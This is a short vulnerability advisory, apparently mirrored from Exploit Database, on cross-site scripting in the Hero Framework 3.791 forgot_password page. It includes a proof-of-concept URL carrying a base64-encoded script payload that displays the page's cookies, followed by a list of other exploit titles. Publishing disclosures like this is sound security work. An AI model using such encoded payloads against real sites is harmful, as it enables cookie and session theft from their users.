Hero Framework – ‘/users/forgot_password?error’ Cross-Site Scripting

Exploit Database
16 阅读

作者： High-Tech Bridge

日期： 2013-04-10
类别：
- webapps
平台：
- java
来源：https://www.exploit-db.com/exploits/38462/

source: https://www.securityfocus.com/bid/59041/info
 
Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Hero 3.791 is vulnerable; other versions may also be affected. 

http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

last Exploits
Hero Framework – ‘/users/forgot_password?error’ Cross-Site Scripting的更多信息

Owl Intranet Engine 1.00 – ‘userid’ Authentication Bypass：
VideoFlow Digital Video Protection (DVP) 2.10 – Directory Traversal：
Honey Soft Web Solution – Multiple Vulnerabilities：
CSZ CMS 1.2.9 – ‘Multiple’ Blind SQLi(Authenticated)：
ZBL EPON ONU Broadband Router 1.0 – Remote Privilege Escalation：
TimeClock Software 0.995 – (Authenticated ) Multiple SQL Injections：
CS-Cart 1.3.3 – ‘classes_dir’ LFI：
osCommerce – Arbitrary File Upload / File Disclosure：